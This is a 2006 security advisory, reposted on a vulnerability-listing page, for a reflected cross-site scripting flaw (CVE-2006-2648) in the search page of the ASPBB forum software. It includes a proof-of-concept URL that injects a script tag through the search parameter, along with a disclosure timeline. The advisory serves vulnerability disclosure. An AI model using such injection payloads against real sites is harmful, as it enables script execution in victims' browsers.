Advisory: ASPBB <= 0.52 (perform_search.asp) XSS vulnerability

2006-05-30 / 2006-05-31

Credit: Mustafa Can Bjorn IPEKCI (nukedx nukedx com)

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-2648

CWE: CWE-79

CVSS Base Score: 2.6/10

Impact Subscore: 2.9/10

Exploitability Subscore: 4.9/10

Exploit range: Remote

Attack complexity: High

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

--Security Report--
Advisory: ASPBB <= 0.52 (perform_search.asp) XSS vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 04:26 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Web: http://www.nukedx.com
}
---
Vendor: ASPBB (www.aspbb.org)
Version: 0.52 and prior versions must be affected.
About: Via this method remote attacker can make malicious links for  
clicking and
when victim clicks this links victim's browser would be inject with XSS.
Level: Harmless
---
How&Example:
GET -> http://[site]/perform_search.asp?search=">[XSS]
EXAMPLE ->  
http://[site]/perform_search.asp?search="><script>alert('X');</script>
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Advisory: ASPBB <= 0.52 (perform_search.asp) XSS vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Advisory: ASPBB <= 0.52 (perform_search.asp) XSS vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.